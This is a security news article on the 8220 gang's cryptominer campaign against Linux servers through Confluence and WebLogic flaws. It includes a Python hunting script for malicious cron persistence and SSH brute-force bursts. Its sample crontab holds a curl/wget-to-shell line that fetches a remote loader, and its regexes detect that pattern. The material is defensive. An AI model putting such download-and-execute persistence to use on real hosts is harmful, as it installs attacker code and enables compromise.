A cloud threat actor group tracked as 8220 has updated its malware toolset to compromise Linux servers with the goal of installing crypto miners as part of a long-running campaign.
"The update includes the deployment of new versions of a crypto miner and an IRC bot," Microsoft Security Intelligence said in a series of tweets on Thursday. "This group has actively updated its techniques and payloads over the last year."
8220, active since early 2017, is a Chinese-speaking, Monero-mining threat actor, so named for its preference for communicating with its command-and-control (C2) servers over port 8220. It is also the developer of a tool called whatMiner, which has been co-opted by the Rocke cybercrime group in its attacks.
In July 2019, the Alibaba Cloud Security Team uncovered a further shift in the adversary's tactics, noting its use of rootkits to hide the mining program. Two years later, the gang resurfaced with Tsunami IRC botnet variants and a custom "PwnRig" miner.
According to Microsoft, the latest campaign, which targets i686 and x86_64 Linux systems, exploits the newly disclosed Atlassian Confluence Server flaw (CVE-2022-26134) and the Oracle WebLogic flaw (CVE-2019-2725) for initial access.
Initial access is followed by retrieving a malware loader from a remote server that is designed to drop the PwnRig miner and an IRC bot, but not before the loader takes steps to evade detection by clearing log files and disabling cloud monitoring and security software.
In addition to achieving persistence by means of a cron job, "the loader uses the IP port scanner tool 'masscan' to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool 'spirit' to propagate," Microsoft said.
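The two host-side traces that this tradecraft leaves, a cron entry that pulls and runs a remote loader, and a burst of SSH password failures from one peer followed by a success, are the things a responder would hunt for first. The script below is an added example written for this article; it is not code from Microsoft, Akamai or the 8220 gang, and it does not model masscan or "spirit" themselves. The crontab and auth.log lines, the IP addresses, host names, paths and the five-failures-in-sixty-seconds threshold are all constructed for illustration.

```python
"""Hunting checks for 8220-style persistence and SSH propagation.

Added example: flags crontab entries that download-and-execute a remote
script or run from temp/hidden paths, and detects SSH password-spraying
bursts in auth.log-style lines, noting whether the spray was followed by
a successful login (the host has become a propagation point).
All sample data below is constructed, not captured from a real incident.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed crontab; the loader URL, port and paths are hypothetical.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * (curl -fsSL http://198.51.100.7:8220/x.sh || wget -q -O- http://198.51.100.7:8220/x.sh) | sh
@reboot /usr/local/bin/backup.sh
* * * * * /tmp/.X11-unix/.r/run >/dev/null 2>&1
"""

# Constructed auth.log excerpt: one source sprays passwords, then gets in.
SAMPLE_AUTH_LOG = """\
Jun 30 10:00:01 web1 sshd[2101]: Accepted publickey for deploy from 10.0.0.5 port 50102 ssh2
Jun 30 10:00:02 web1 sshd[2103]: Failed password for root from 10.0.0.77 port 41000 ssh2
Jun 30 10:00:02 web1 sshd[2104]: Failed password for invalid user admin from 10.0.0.77 port 41001 ssh2
Jun 30 10:00:03 web1 sshd[2105]: Failed password for invalid user oracle from 10.0.0.77 port 41002 ssh2
Jun 30 10:00:03 web1 sshd[2106]: Failed password for root from 10.0.0.77 port 41003 ssh2
Jun 30 10:00:04 web1 sshd[2107]: Failed password for invalid user test from 10.0.0.77 port 41004 ssh2
Jun 30 10:00:04 web1 sshd[2108]: Failed password for invalid user ubuntu from 10.0.0.77 port 41005 ssh2
Jun 30 10:00:05 web1 sshd[2109]: Accepted password for root from 10.0.0.77 port 41006 ssh2
Jun 30 10:05:00 web1 sshd[2130]: Failed password for bob from 10.0.0.9 port 52000 ssh2
"""

# A cron command that fetches from the network and pipes into a shell, or
# that executes from a temp directory, is the classic miner-loader pattern.
REMOTE_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
SUSPICIOUS_PATH = re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/")

def flag_cron_entries(crontab_text):
    """Return (line_number, reason, line) for entries worth a second look."""
    findings = []
    for n, line in enumerate(crontab_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if REMOTE_EXEC.search(line):
            findings.append((n, "downloads and executes remote script", line))
        elif SUSPICIOUS_PATH.search(line):
            findings.append((n, "runs binary from temp/hidden path", line))
    return findings

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_ssh_bruteforce(log_text, threshold=5, window_seconds=60, year=2022):
    """Return {ip: (failure_count, attempted_users, success_after_burst)} for
    sources with at least `threshold` failed logins inside any
    `window_seconds` window.  syslog lines carry no year, so one is assumed."""
    events = defaultdict(list)           # ip -> [(datetime, result, user)]
    for line in log_text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events[m["ip"]].append((ts, m["result"], m["user"]))

    hits = {}
    for ip, evs in events.items():
        evs.sort()
        fails = [(t, u) for t, r, u in evs if r == "Failed"]
        start, burst = 0, False
        for end in range(len(fails)):     # sliding window over failure times
            while (fails[end][0] - fails[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                burst = True
                break
        if burst:
            last_fail = fails[-1][0]
            success_after = any(r == "Accepted" and t >= last_fail for t, r, _ in evs)
            hits[ip] = (len(fails), sorted({u for _, u in fails}), success_after)
    return hits

if __name__ == "__main__":
    for n, reason, line in flag_cron_entries(SAMPLE_CRONTAB):
        print(f"cron line {n}: {reason}: {line}")
    for ip, (fails, users, pwned) in detect_ssh_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {fails} failed logins as {users}; login succeeded afterwards: {pwned}")
```

Because the loader clears log files before it runs, the SSH check is only dependable against logs that were already forwarded off the host (remote syslog or the cloud provider's log agent) and against the neighbouring victims' logs, where the brute-force source is the first compromised machine; run the cron check on every host that peer reached.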
The findings come as Akamai disclosed that it has witnessed a steady 20,000 exploitation attempts per day against the Atlassian Confluence flaw from roughly 6,000 IPs, down from a peak of 100,000 shortly after the bug's disclosure on June 2, 2022. About 67% of the attacks originated from the United States.
"At the forefront, commerce accounts for 38% of the attack activity, followed by high-tech and financial services, respectively," said Chen Doytshman of Akamai this week. "These top three industries account for more than 75% of the activity."
According to the cloud security company, the attacks range from probing to determine whether a targeted system is vulnerable to injecting malware such as web shells and crypto miners.
"Of particular concern is how much this attack type has shifted upwards in the last few weeks," Doytshman added. "As we saw with a similar vulnerability, CVE-2022-26134 could continue to be exploited for at least the next few years."